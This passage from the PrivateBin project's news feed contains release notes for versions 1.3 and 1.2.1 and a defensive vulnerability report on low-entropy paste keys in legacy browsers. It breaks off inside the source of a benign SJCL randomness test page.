&lt;p&gt;Server operators now have an additional configuration option that lets them &lt;em&gt;disable compression&lt;/em&gt;. While the compression before encryption reduces the size of most text, source code, markdown pastes and text comments drastically, when having file upload enabled and mostly using an instance to share already compressed files (office documents, PNG or JPG images, etc.) this slows down the creation of the pastes unnecessarily and without gain. Furthermore some security minded administrators may wish to disable compression to avoid potential security risks that would make brute forcing keys easier for shorter, compressed pastes.&lt;/p&gt;
&lt;p&gt;As usual we have also upgraded all used libraries to their latest releases. The identicon library now requires PHP 5.5, so this is the new minimum required PHP version.&lt;/p&gt;
&lt;p&gt;Finally the newly used JSON &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Encryption-format"&gt;format&lt;/a&gt; and &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/API"&gt;API&lt;/a&gt; was taken as an opportunity to implement some, otherwise breaking, changes like the use of base58 for the hash key encoding instead of base64, which addresses the Outlook mail client stripping trailing equal signs from URLs. The number of iterations in the PBKDF2 key derivation got increased from 10k to 100k to make it more costly to brute force the password of a paste. The server now uses Fowler–Noll–Vo checksums instead of md5 to generate unique paste IDs.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;Due to some rather annoying bugs in the raw paste view and with URLs mangled by Facebook and Outlook, we do recommend an upgrade on instances that are more widely used. While most users never encountered cases where the pastes got mangled in the deflate compression, users that frequently upload office documents and certain source code and compiler outputs would trigger this rather reliably. There are also several improvements that increase the security of the encryption.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;Two new &lt;em&gt;configuration options&lt;/em&gt;, &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#compression"&gt;&lt;code&gt;compression&lt;/code&gt;&lt;/a&gt; and &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#httpwarning"&gt;&lt;code&gt;httpwarning&lt;/code&gt;&lt;/a&gt; got introduced.&lt;/p&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root. Note that the latest docker containers use different user IDs then the older ones, so you will have to change the ownership of the attached data volume.&lt;/p&gt;
&lt;p&gt;If you do have to use the new release on a PHP 5.4 environment, you can attempt to change the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#icon"&gt;&lt;code&gt;icon&lt;/code&gt;&lt;/a&gt; option to &lt;code&gt;vizhash&lt;/code&gt; or &lt;code&gt;none&lt;/code&gt; and decrease the &lt;code&gt;MIN_PHP_VERSION&lt;/code&gt; in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/lib/Controller.php#L38"&gt;lib/Controller.php&lt;/a&gt; file.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.2.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translation for Czech (#424)&lt;/li&gt;
&lt;li&gt;ADDED: Threat modeled the application (#177)&lt;/li&gt;
&lt;li&gt;ADDED: Made compression configurable (#38)&lt;/li&gt;
&lt;li&gt;CHANGED: Minimum required PHP version is 5.5, due to a change in the identicon library&lt;/li&gt;
&lt;li&gt;CHANGED: Minimum required browser versions are Firefox 54, Chrome 57, Opera 44, Safari 11, Edge 16, due to use of WebCrypto API, async/await, ES6 &amp;amp; WebAssembly features - all Internet Explorer versions are incompatible&lt;/li&gt;
&lt;li&gt;CHANGED: JSON and encryption formats were changed to replace SJCL library by browser integrated WebCrypto API (#28, #74)&lt;/li&gt;
&lt;li&gt;CHANGED: Replaced rawdeflate.js with zlib.wasm to resolve decompression failures and gain compatibility with standard deflate implementations (#193, #260, #328, #434, #440)&lt;/li&gt;
&lt;li&gt;CHANGED: Increase PBKDF2 iterations to 100k (#350)&lt;/li&gt;
&lt;li&gt;CHANGED: Replaced last use of MD5 with Fowler–Noll–Vo checksum which produces the exact length we need for the paste ID (#49)&lt;/li&gt;
&lt;li&gt;CHANGED: Simplified some PHP code &amp;amp; renamed PrivateBin class into Controller, to make MVC pattern use more obvious (#342)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: identicon 1.2.0, random_compat 2.0.18, jQuery 3.4.1, Showdown 1.9.0, DOMpurify 1.0.11 &amp;amp; kjua 0.6.0&lt;/li&gt;
&lt;li&gt;FIXED: Prevent Chrome from sending content of paste to Google for translation (#378)&lt;/li&gt;
&lt;li&gt;FIXED: To support attachments larger then 2 MiB in newer Chrome versions, we switched to blob instead of data URIs (#432)&lt;/li&gt;
&lt;li&gt;FIXED: Since Outlook strips trailing equal signs in links, the key in URL hash is now base58 encoded, instead of base64 (#377)&lt;/li&gt;
&lt;li&gt;FIXED: Facebooks started injecting parameters into shared URLs for tracking that lead to inaccessible pastes (#396)&lt;/li&gt;
&lt;li&gt;FIXED: Properly escaped HTML in raw text mode (#358)&lt;/li&gt;
&lt;li&gt;FIXED: Made download links better readable in the dark bootstrap theme (#364)&lt;/li&gt;
&lt;li&gt;FIXED: Allow Letsencrypt bot to access on apache servers (#413)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Appendix A - Browser feature compatibility&lt;/h2&gt;
&lt;p&gt;The following table provides an overview of when support of the newly used JavaScript features got introduced in the major browsers:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Browser/Feature&lt;/th&gt;
&lt;th&gt;async/await&lt;/th&gt;
&lt;th&gt;Web Crypto API&lt;/th&gt;
&lt;th&gt;WebAssembly&lt;/th&gt;
&lt;th&gt;ECMAScript 2015 (ES6)&lt;/th&gt;
&lt;th&gt;first version to support all features&lt;/th&gt;
&lt;th&gt;Release date&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Chrome&lt;/td&gt;
&lt;td&gt;55&lt;/td&gt;
&lt;td&gt;37&lt;/td&gt;
&lt;td&gt;57&lt;/td&gt;
&lt;td&gt;51&lt;/td&gt;
&lt;td&gt;57&lt;/td&gt;
&lt;td&gt;2017-03-09&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Edge&lt;/td&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;2017-09-26&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firefox&lt;/td&gt;
&lt;td&gt;52&lt;/td&gt;
&lt;td&gt;34&lt;/td&gt;
&lt;td&gt;52&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;2017-06-13&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IE&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Opera&lt;/td&gt;
&lt;td&gt;42&lt;/td&gt;
&lt;td&gt;24&lt;/td&gt;
&lt;td&gt;44&lt;/td&gt;
&lt;td&gt;38&lt;/td&gt;
&lt;td&gt;44&lt;/td&gt;
&lt;td&gt;2017-03-21&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Safari&lt;/td&gt;
&lt;td&gt;10.1&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;2017-09-19&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Except for Internet Explorer, all major browsers support the new features since March to September 2017. Internet Explorer 11 lacks support for WebAssembly (used for zlib compression) and async/await. The WebCrypto API is based on &lt;code&gt;Promise&lt;/code&gt; interfaces and we use &lt;code&gt;await&lt;/code&gt; to avoid having to rewrite large code segments from synchronous function calls to &lt;code&gt;Promise&lt;/code&gt;-based, asynchronous logic. In light of this, we decided to drop support for Internet Explorer, as Windows users that can't install other browsers can use PrivateBin with the Edge browser instead.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.2.1 - Fix for low entropy key vulnerability in legacy browsers</title><link href="https://privatebin.info/news/v1.2.1-release.html" rel="alternate"/><published>2018-08-11T22:30:00+02:00</published><updated>2018-08-11T22:30:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2018-08-11:/news/v1.2.1-release.html</id><summary type="html">&lt;p&gt;This release fixes a low entropy key vulnerability in PrivateBin affecting legacy browsers.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes a low entropy key vulnerability in PrivateBin affecting legacy browsers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;On 31st of July 2018, &lt;strong&gt;&lt;a href="https://github.com/cryptolok"&gt;@cryptolok&lt;/a&gt;&lt;/strong&gt; reported a cryptographic vulnerability in PrivateBin due to the incorrect use of SJCL when used on very old browsers. When creating a paste using any ZeroBin version or PrivateBin up to and including 1.1.1 on a browser without web crypto API support (Firefox&amp;lt;21, Chrome&amp;lt;15, Safari&amp;lt;5, IE&amp;lt;11) the key may have been generated without sufficient entropy. PrivateBin 1.2 was not affected, because the support for those browser versions got removed in the JS refactoring.&lt;/p&gt;
&lt;p&gt;This release re-adds support for those legacy browsers and ensures they generate the key with sufficient entropy. In the next release of PrivateBin we will permanently drop legacy browser support and switch to the web crypto API exclusively. This release ensures that there is at least one release available that supports both legacy browsers and has the entropy issue fixed.&lt;/p&gt;
&lt;p&gt;Further details on this is an issue and its implications can be found in our &lt;a href="https://privatebin.info/reports/vulnerability-2018-08-11.html"&gt;report on the vulnerability&lt;/a&gt;. It also describes methods to check if your browser is currently affected by the issue. If it is, please consider updating your browser.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;If you are still using PrivateBin version 1.1.1 or ZeroBin, upgrading to this release will ensure that you retain legacy browser support and fix the low entropy key vulnerability in your current version. If you already upgraded to PrivateBin 1.2 and don't need to support these very old browser versions (released before October 2013) then you could consider skipping this release.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;p&gt;Note that this is the first release that is signed with &lt;a href="https://privatebin.info/key/release.asc"&gt;the new signing key&lt;/a&gt; (fingerprint: &lt;code&gt;28CA 7C96 4938 EA5C 1481  D42A E11B 7950 E9E1 83DB&lt;/code&gt;). This key is intended to be used for signing releases from now on.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.2&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Add support for mega.nz links in pastes and comments (#331)&lt;/li&gt;
&lt;li&gt;CHANGED: Added some missing Russian translations (#348)&lt;/li&gt;
&lt;li&gt;CHANGED: Minor PHP refactoring: Rename PrivateBin class to Controller, improved logic of some persistence classes (#342)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading DOMpurify library to 1.0.7&lt;/li&gt;
&lt;li&gt;FIXED: Ensure legacy browsers without webcrypto support can't create paste keys with insufficient entropy (#346)&lt;/li&gt;
&lt;li&gt;FIXED: Re-add support for old browsers (Firefox&amp;lt;21, Chrome&amp;lt;31, Safari&amp;lt;7, IE&amp;lt;11), broken in 1.2, will be removed again in 1.3&lt;/li&gt;
&lt;/ul&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report</title><link href="https://privatebin.info/reports/vulnerability-2018-08-11.html" rel="alternate"/><published>2018-08-11T22:30:00+02:00</published><updated>2018-08-11T22:30:00+02:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2018-08-11:/reports/vulnerability-2018-08-11.html</id><summary type="html">&lt;p&gt;On 31st of August, &lt;a href="https://github.com/cryptolok"&gt;@cryptolok&lt;/a&gt; reported a cryptographic vulnerability in PrivateBin, which has been fixed in &lt;a href="https://privatebin.info/news/v1.2.1-release.html"&gt;PrivateBin v1.2.1&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;On 31st of July 2018, &lt;strong&gt;&lt;a href="https://github.com/cryptolok"&gt;@cryptolok&lt;/a&gt;&lt;/strong&gt; reported a cryptographic vulnerability in PrivateBin due to the incorrect use of SJCL when used on very old browsers. Vulnerability write-up done by &lt;a href="https://github.com/rugk"&gt;@rugk&lt;/a&gt; and &lt;a href="https://github.com/elrido"&gt;@elrido&lt;/a&gt;.&lt;br&gt;
The vulnerability has been fixed in &lt;a href="https://privatebin.info/news/v1.2.1-release.html"&gt;PrivateBin v1.2.1&lt;/a&gt;. Admins are urged to upgrade to this version to protect the affected users.&lt;/p&gt;
&lt;h2&gt;Affected versions&lt;/h2&gt;
&lt;p&gt;Any ZeroBin and PrivateBin lower then version 1.2 (which did not support the affected browsers) since the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/52630374e535692d67fe01f782ef137d5886bb10/lib/zerobin.js#L183"&gt;first commit to ZeroBin&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Conditions&lt;/h2&gt;
&lt;p&gt;The condition is only met when a paste is first created, during the generation of a random key used for the encryption of the paste and any subsequent discussion topics. Viewing the paste does not pose a risk in itself, as the key already is known to the viewer.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Browsers that expose the web crypto API function &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues"&gt;&lt;code&gt;crypto.getRandomValues()&lt;/code&gt;&lt;/a&gt; and nodeJS (in case of the CLI client) are not affected. See the timeline of browser releases with web crypto support in the appendix below.&lt;/li&gt;
&lt;li&gt;For browser versions that do not provide this API, SJCL provides a fallback using collected randomness from mouse movements, keypresses, motion sensors, etc. While ZeroBin and PrivateBin did implement this fallback and a check to ensure that enough entropy got collected, the incorrect use of the randomwords function in SJCL allowed a premature generation of the paste key, even if not enough entropy had been collected. The collection of entropy takes around 20 - 90 seconds, depending on the performance of the system (minimum and maximums as found during testing on 800 Mhz single core and 2.7 GHz quad core CPU systems).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Steps to reproduce&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Find a way to install an affected browser or use a system that still has such an old browser installed. Our tests if the mitigation were performed primarily using Firefox 10.&lt;/li&gt;
&lt;li&gt;Visit a PrivateBin or ZeroBin site running a release earlier then version 1.2.&lt;/li&gt;
&lt;li&gt;Quickly paste some content into the text area, set options and hit send within less then 20 - 60 seconds (depending on the performance of the environment).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If the entropy is not ready, PrivateBin before version 1.2 would suppress any error, generate the key regardless and submit the paste. PrivateBin 1.2 doesn't support these old browsers, sending the paste to the URL "undefined" and fails to submit the paste. PrivateBin v1.2.1 asks you to move your mouse, etc. to create entropy on these older browsers, as intended.&lt;/p&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;On affected browsers the pastes may have been generated with low entropy. Viewing pastes on any browser does not pose a risk. When comments are posted on such a paste, the low entropy key gets reused. There is no obvious way to detect a key with insufficient entropy. It will have the same length as usual and seem random to the human eye. &lt;/p&gt;
&lt;p&gt;We have to assume that pastes generated with a low entropy key can be brute forced easier then with a completely random key. With a lower entropy, the total amount of different generated keys would be lower then 2^256 (we use 256bit long keys).&lt;/p&gt;
&lt;h2&gt;Real-life impact&lt;/h2&gt;
&lt;p&gt;We have not conducted any research on how frequent such affected pastes are. However, on the instance of one of the maintainers, the oldest found paste was created in 2015 and so seems unlikely to be affected, while on PrivateBin.net the oldest paste is from 2017. By default most pastes are set to expire within a week. A user would have had to set the expiration explicitly to "never" for it to be still available.&lt;/p&gt;
&lt;p&gt;At the time of the first ZeroBin commit affected by this issue in April 21st 2012, the then current releases of Chrome and Safari already supported the required web crypto API call and were not affected. One and a half years later, end of October of 2013, releases of Firefox, Internet Explorer, iOS and Android where available that supported the new API also and were no longer affected. Opera as of March 2014 is also unaffected.&lt;/p&gt;
&lt;p&gt;When ZeroBin was first released, about 60% of the used browsers were affected (see browser market share in the appendix below). By the end of 2013 the market share of browsers still affected in their latest release was below 3%. Even during this time pastes created with affected browsers may have had sufficient entropy as the key is generated just before sending the paste, as long as the user creating the paste spent more then ~30 seconds on the page. On the other hand, users that send a paste "too quickly" could have easily created a paste with a key with limited entropy within a few seconds.&lt;/p&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;Users that know of old pastes generated with outdated browsers may want to clone the pastes using a more recent browser and delete the old paste, if they still have the delete token URL.&lt;/p&gt;
&lt;p&gt;Administrators should update their instances to PrivateBin version 1.2.1.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2018-07-31 – Reporter &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/251"&gt;raised an issue&lt;/a&gt;, after reviewing the PrivateBin source code.&lt;/li&gt;
&lt;li&gt;2018-07-31 – Receipt confirmed, started preparing vulnerability report to collect findings.&lt;/li&gt;
&lt;li&gt;2018-08-01 – Issue confirmed, research of versions and timelines, aquired access to environement with legacy browsers for testing.&lt;/li&gt;
&lt;li&gt;2018-08-04 – Patch developed and tested to resolve the issue in legacy browsers.&lt;/li&gt;
&lt;li&gt;2018-08-05 – Worked on vulnerability report, release preparations.&lt;/li&gt;
&lt;li&gt;2018-08-xx – &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/1.1.1"&gt;Release published&lt;/a&gt; &amp;amp; Vulnerability details published.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Appendix&lt;/h2&gt;
&lt;h3&gt;Release history of unaffected browsers / affected ZeroBin versions&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;2014-04-14 - Windows Phone 8.1&lt;/li&gt;
&lt;li&gt;2014-03-04 - Opera 20&lt;/li&gt;
&lt;li&gt;2013-10-31 - Android 4.4&lt;/li&gt;
&lt;li&gt;2013-10-17 - Internet Explorer 11&lt;/li&gt;
&lt;li&gt;2013-09-18 - iOS 7.0&lt;/li&gt;
&lt;li&gt;2013-05-14 - Firefox 21&lt;/li&gt;
&lt;li&gt;2012-04-21 - &lt;strong&gt;first commit of ZeroBin&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;2011-10-25 - Chrome 15&lt;/li&gt;
&lt;li&gt;2010-06-07 - Safari 5&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Disclaimer: In the case of Chrome, Android, iOS and Windows Phone, there may have been earlier versions that were not affected, but we did not have access to any of these (in the case of iOS version 4.3.2 was found to be affected). See the details on the tested browser versions below.&lt;/p&gt;
&lt;h3&gt;Browser market share in April 2012&lt;/h3&gt;
&lt;p&gt;Source: &lt;a href="https://www.statista.com/statistics/268254/market-share-of-internet-browsers-worldwide-since-2009/"&gt;Statista - Market share of browsers worldwide since 2009&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;IE 30.8%&lt;/li&gt;
&lt;li&gt;Chrome 28.24%&lt;/li&gt;
&lt;li&gt;Firefox 22.5%&lt;/li&gt;
&lt;li&gt;Safari 8.72%&lt;/li&gt;
&lt;li&gt;Opera 3.62%&lt;/li&gt;
&lt;li&gt;Android 2.31%&lt;/li&gt;
&lt;li&gt;UC Browser 0.74%&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Source code of the used SJCL-Test page&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;content-type&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/html; charset=UTF-8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;SJCL randomwords test&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;robots&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;noindex, nofollow&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;googlebot&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;noindex, nofollow&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;viewport&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;width=device-width, initial-scale=1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://bitwiseshiftleft.github.io/sjcl/sjcl.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// IE polyfill&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;now&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;now&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;now&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ow"&gt;new&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nx"&gt;getTime&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createElement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;p&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;innerHTML&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;appendChild&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
